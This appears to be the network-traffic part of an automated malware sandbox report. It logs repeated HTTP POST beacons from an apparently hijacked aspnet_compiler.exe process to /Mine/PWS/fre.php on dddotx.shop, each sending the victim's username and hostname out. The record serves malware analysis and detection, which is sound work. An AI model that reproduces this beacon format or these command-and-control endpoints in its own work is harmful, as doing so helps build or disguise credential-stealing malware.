Sep 25, 2024 10:19:44.852020025 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrMoExIn6zCRLgBGDR0trGo6nr6hZxWEpppBkAXR0J6vM3%2BoCo5aGT2AQ%2BCo3BKomYi4QMzPgUqqcteldXMT5yA0GMpmCLY1oFxi9BOxosBHVRvtP943vzXEmTEHTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89974bbf8ac472-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49743	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:45.011918068 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:45.016788960 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:45.666337013 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilnRTbzwidVBkYl%2F7gnjchWLcfaayS7uEkP5YEi2Drg2NXC0xu%2Fq3iywAuFf%2B22PIYBQ%2BizHYyYeeCliLwqQIwGOjJnyiMQVpCfaHDuUSK2BWdg5sE325ot0DLzesA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899750db7b8c77-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49744	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:45.823864937 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:45.828744888 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:46.545284986 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUEiqJ2%2FxBhjE3zR0Pq4uqI7ZGxLhRWDexXAPwS9hD9wvYeydR91PwGJrsM2Q2T42ExwdlXM7uEtagbWbtIwO13EZagTEyFV3bOjaPAzcGXwKstnubuhFL1CznJKag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899755fcaa728d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49745	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:46.706866026 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:46.711711884 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:47.442342997 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAq9ymHsEFM7epHmG8y%2FSn1IMi0RwGTA35HdMyPn0WZo%2FWD0v3jhi7eP7I5SHsO0HeyKplTTCtBfInutuYBxMYPYRvQO%2FX2rc49Cu6w2Q1CUwCxArR5K3c7ZMrHHgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89975b6ea580cd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49746	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:47.588154078 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:47.595407009 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:48.276973009 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktE1omBrgppOCFhCJGAkavSlCweT3xpn4GPlS5Wp8MtdNRqLgNs6M2XM8fXtii5X7KJt%2FXArRKW6wNlZprTQM8ONs8VaeQ75t9spJJwkT9dYI8nxiperU90SvHF%2BUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89976109c17281-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49747	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:48.432363987 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:48.437320948 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:49.076529980 CEST	575	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zghoVkJEDBFU%2B%2BFypdatlXNFHIMZQlx0M3wY%2F5rnDC3j6sLWNDw0AhUiK7or6TdLpBSP%2FkzvH%2FH8alO15WRA2c4bh0OprjievX3M%2B70vHYfi2ClF%2BUYxp1GzpkxwsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997663ed442b7-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49748	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:49.228828907 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:49.234721899 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:49.885318041 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJmm8NuiJDkCvdiGCAwLZaGQQDnNT%2F1S31KHBTsiBStx%2BabQYBKt5mLXMd0LrWAKJhag5fB5wwAv1xEzAmZe%2FGKYp4P6xbmuShZWMXtDn5JpxspBg1ajhR8HBAINqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89976b3fad432c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49749	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:50.040664911 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:50.049266100 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:50.708355904 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpexswP98%2F2pDJcny2a9b1O4le5X4RQ4Cv%2BNl7m1%2BQ29LWwNP8YliG8dbqv7SfAMiw5WICI9NAHufIQMLy9GLYc6Ti0cDwUfMUOnQvV4VYxIe8ayudDFgmjTjaGZZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997705d054240-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49750	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:50.853298903 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:50.858143091 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:51.172909975 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:51.507719040 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fRbcMTi7zPtHQzgmfDcOtNe5KKlEoD8Tjow5ukjcdTWdPt6WqZTr8qKHf3pLTMmUHSW1ConLkwcBB1PIvjo36g%2BktdSrJgq%2F%2Bv1sgCbsi1GOrtQYec%2FrcAibjmD8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899775599442d8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49751	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:51.653358936 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:51.659792900 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:52.349291086 CEST	599	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUHIThiFS8tXEsyabsfo%2BCqRWUIQEZ62eJsfEAHuFSsNZHrJvzTM6hR2wsJWIU%2B5UR0oSwT%2FSPbnUV5NxjKiUh2TY3p77%2BjXgryPc9C6NMbFHyVuzqDy9shSppXCQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89977a5b3832ca-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49752	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:52.629637957 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:52.634584904 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:53.355499029 CEST	605	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMuK6zE%2B5ZSslvpDKoPsORsgCE3a9%2Fc%2Fvw%2F7v0AdIKO79YinzjHDQ49LhIcpcbxygnnW7tLE3yOquD%2BV%2BElw5wqrnWN5iyHSNnL82eA%2FGdN39Wz9SxvPHOr0qTMJig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997808cf05e6d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49753	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:53.518424034 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:53.523329020 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:54.186008930 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEkA3O15eLFt7amdNK%2BX7yKyciZyTihYXc9Mz4uM1E7RSuqM4UYClZFHhVU%2B7N%2BdOmP76miVgGbLU7U0g3pP3B6HaUhyfesJOYL78nHLkeZDfp5eFZusm5Q1JG15sA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997861dbc0ca1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49754	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:54.531418085 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:54.536452055 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:55.325730085 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POROGUvL4q4IXiL9faqhhGbKgg%2BbEmJhfXeeBiYnk1LTuSChrzp88RrezVuHwg26QSo1G63pVJpGU8YFdxY1jSPgdyJo1qkeRKr84Dv5mE4udHmFdhvCuXmLZWiZAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89978c694ec345-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49755	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:55.480483055 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:55.485677958 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:56.126749992 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAo6esAYNKITwmUrNOf4gGk8ofwYsKn59ZAJbhIBvquSBZ3RrQQNpp1ym%2BoLbbsNuv4xfPVdVX983eO7SXFBo1gYCX%2Fw3On4u%2BWBpsobAN3spr2%2BoZCBjGkTuDHFbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89979238a2438c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49756	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:56.296606064 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:56.301649094 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:57.009186983 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=34ibHf9PrCXy%2BELJbb9G9c7ndIXNX73s%2BXtZ8pDB20PlRVPGqPN8%2BZN43I0IU%2FI9fQA3NRqKeESoQcYV46OHvK9h9bnutrrR%2BrKI0xNB0TMDQOzeXOtgkiJdFUzKhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997974bde0f79-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49757	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:57.167869091 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:57.172763109 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
